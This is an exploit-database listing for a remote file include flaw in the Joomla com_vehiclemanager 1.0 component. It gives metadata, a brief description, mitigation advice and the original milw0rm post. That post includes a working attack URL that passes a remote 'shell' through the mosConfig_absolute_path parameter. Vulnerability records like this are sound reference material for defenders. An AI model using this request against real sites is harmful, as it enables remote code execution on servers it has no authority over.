header-logo
Suggest Exploit
vendor:
com_vehiclemanager
by:
xoron
8,8
CVSS
HIGH
Remote File Include
98
CWE
Product Name: com_vehiclemanager
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:joomla:com_vehiclemanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla com_vehiclemanager 1.0 Remote File Include

A vulnerability in Joomla com_vehiclemanager 1.0 allows an attacker to include a remote file via the mosConfig_absolute_path parameter in the toolbar_ext.php script.

Mitigation:

Update to the latest version of Joomla com_vehiclemanager 1.0
Source

Exploit-DB raw data:

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

  Joomla com_vehiclemanager 1.0 Remote File Include

  Download: http://ordasoft.com/Download-document/1-Vehicle-Manager-Basic.html

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
          -> .../com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=shell?

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Thanx: str0ke, VoLkan

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2009-06-09]